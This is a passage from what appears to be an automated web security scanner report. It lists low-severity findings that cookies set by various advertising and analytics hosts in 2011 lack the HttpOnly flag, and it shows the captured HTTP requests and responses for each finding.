P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 15:32:31 GMT
Set-Cookie: HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056
Set-Cookie: LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1484

lpConnLib.Process({"ResultSet": {"lpCallId":"802803296362-872958060353","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

13.186. http://services.krxd.net/geoip

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /geoip

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ServedBy

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geoip?root_name=KRUX.ST.geo HTTP/1.1
Host: services.krxd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=28800
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:00:27 GMT
Etag: "833b91a59b2962c75db21f499c2e9829d1408b57"
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Krux Cache
Set-Cookie: ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT
Via: 1.1 logger-b003.krxd.net
X-Age: 1
X-Cache: HIT
X-Cache-Hits: 1
X-GeoIP: 50.23.123.106
X-Request-Backend: geoip
X-Request-Time: D=543 t=1315321227510505
X-Served-By: logger-b003.krxd.net
X-Served-By: logger-b003.krxd.net
Content-Length: 75
Connection: keep-alive

KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}

13.187. http://services.krxd.net/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ServedBy

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh&_kuid=HK4OZLzp&_kpa_site=cnbc&_kpa_sect=home&_kpa_sub=homeus&_kpa_pageid=15839285&_kpa__c=homeus&_kpa_tandomad=none&_kpa_pm=1&kplt0=146&fired=beforeunload&_knifr=4&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_kcp_sc=home&_kcp_ssc=homeus HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Tue, 06 Sep 2011 14:57:00 GMT
Last-Modified: Thu, 25 Aug 2011 01:26:31 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT
X-Request-Time: D=258 t=1315321020652677
X-Served-By: logger-b011.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

13.188. http://sophelle.app5.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: sophelle.app5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-04%252010%253A55%253A54

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 575
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 15:27:50 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 45129;
var hsWeekEndsIn = 477129;
var hsMonthEndsIn = 2118729;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-06 11:27
...[SNIP]...

13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcscnww13100008eg8v7k3x39_3j3x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscnww13100008eg8v7k3x39_3j3x/dcs.gif?&dcsdat=1315345545796&dcssip=www.cvs.com&dcsuri=/CVSApp/promoContent/promoLandingTemplate.jsp&dcsqry=%3FpromoLandingId=1350%26WT.mc_id=PS_ECBC_Google&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=Direct%2BBeauty%2BProduct&WT.co_f=50.23.123.106-4086325760.30173190&WT.vt_sid=50.23.123.106-4086325760.30173190.1315345545800&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=CVS%20Beauty%20Club%20ExtraCare%20offer%20deals%20cosmetics%20beauty%20extrabucks%20skincare%20and%20haircare&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fi=Yes&WT.fv=10.3&WT.tv=1.1.0&WT.dl=0&WT.es=www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp&WT.cg_s=1350&WT.sp=OTC%3BRx&WT.cg_n=Shared&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&cvs_serverinstance=prd-app-311&authStatus=0&promotion=1350_CVS%2BBeauty%2BClub%2BExtraCare%2Boffer%2Bdeals%2Bcosmetics%2Bbeauty%2Bextrabucks%2Bskincare%2Band%2Bhaircare&ExtraCare=NO HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 16:45:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAOAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAADpOZk46TmZOCQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAAA6TmZOOk5mTgAAAAA-; path=/; expires=Fri, 03-Sep-2021 16:45:46 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

13.190. http://t2.trackalyzer.com/trackalyze.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.shopify.com/%3Fgclid%3DCK6YvLv4iKsCFSE8gwod-iiK3g&i=1 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 15:32:01 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eshopify%2Ecom%2F%3Fgclid%3DCK6YvLv4iKsCFSE8gwod%2DiiK3g; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

13.191. http://t5.trackalyzer.com/trackalyze.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t5.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.tenzing.com/atg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&i=18085 HTTP/1.1
Host: t5.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 15:31:49 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Etenzing%2Ecom%2Fatg%2Decommerce%2Dhosting%2Easp%3Futm%5Fsource%3DPG0008%2DATG%2DSolutions%26utm%5Fcampaign%3D001%26utm%5Fcontent%3D01%26utm%5Fterm%3D%252BATG%2520%252Bsolutions%26utm%5Fmedium%3DPPC; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>

13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/677/cnbc/300x250/atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1157
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/677/cnbc/728x90/atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1147
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:38 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

13.194. http://tags.bluekai.com/site/3834

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3834

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3834 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: bk=gmD52hDC+h5Mq/0A; bkc=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; bko=KJhf0X49XB1pNRIHyjQ4hMGZ0LexgykilKOQRcY+ixS0JgWh1shPX4PMj8M/eVWh1jpZRZeGOq/RsKETRS0pleeVnhW/iT7Cei21nOc/rLReWo1atF+YpzSwZDWu0ZJA99YljOt7; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAg6FxNWRh7dUE4UeP6LMyzYAxSDkOAv6m7uQ9bnSHkn2J6H1H9KhtuyZGNkihivHBm/wxmQPBGwGJLfg+MtPa7zT8IxXfd1Ipl7KIpA12agz3LNenQTsqLdj/50Bt/CcqEbmhMHueWJL0YnSj33fMlWyvjMOw+ubcojN1yFmAmRcZJFxdaaPWlBqleiC7SZkh7pdovgiMSyOUxuZsNzB3u3Dab70LpaF3XHlTs/VTZVUeATMQCE1u9X10BkPxMbeUWjVCII8Sn9U+PItKYklnNc+Iu40IiLic/4u1SsLPrI8F+5dMcO1hZ1ht9HKMCK6rkK5SSkAS5RQeyAfd0LWrD8GJvDuhtVHP+6bYYNgjcFaHixpAbt17j7TtaP/EYcFCFyBE6kGPC0Mb+7mlm68pXFBpefkMFASUi4ajm1o73h3UxKwvSNf/m4V03pr6loVdH7oUwgrfvPfEukVc4tPjqlEn2H6MMT=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpn+16wb9D9y+ejQPVux9SlyLv; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e66358a; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 07 Sep 2011 15:00:28 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Wed, 07-Sep-2011 15:00:28 GMT; path=/; domain=.bluekai.com
BK-Server: bbc9
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.195. http://tenzing.fmpub.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tenzing.fmpub.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?t=z&n=4479&keywords=business|electroniccommerce|gatewayinc|ibmcorp|&fleur_de_sel=1936597090680152 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltuid=1e26f8d5f332f1261c9af6b2d31021eb; vuid=1e26f8d5f332f1261c9af6b2d31021eb

Response

HTTP/1.0 204 No Content
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Content-Length: 0
X-Server: adserver5.tor.fmpub.net
Connection: close
Content-Type: application/x-javascript


13.196. http://ticker.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ticker.cnbc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ticker.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 04 Dec 2006 02:08:57 GMT
ETag: "32-423bdd50c8040"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/html
Expires: Tue, 06 Sep 2011 15:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:05:59 GMT
Connection: close
Set-Cookie: pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/

<script>
window.location="/main.do";
</script>


13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1227/visitor.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1227/visitor.gif?ts=1315341157226&ref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1
Host: www.actonsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Tue, 06 Sep 2011 15:32:49 GMT
Connection: close

GIF89a.............!.......,...........L..;

13.198. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=901&url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&pageUrl=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&time=1315341168499 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
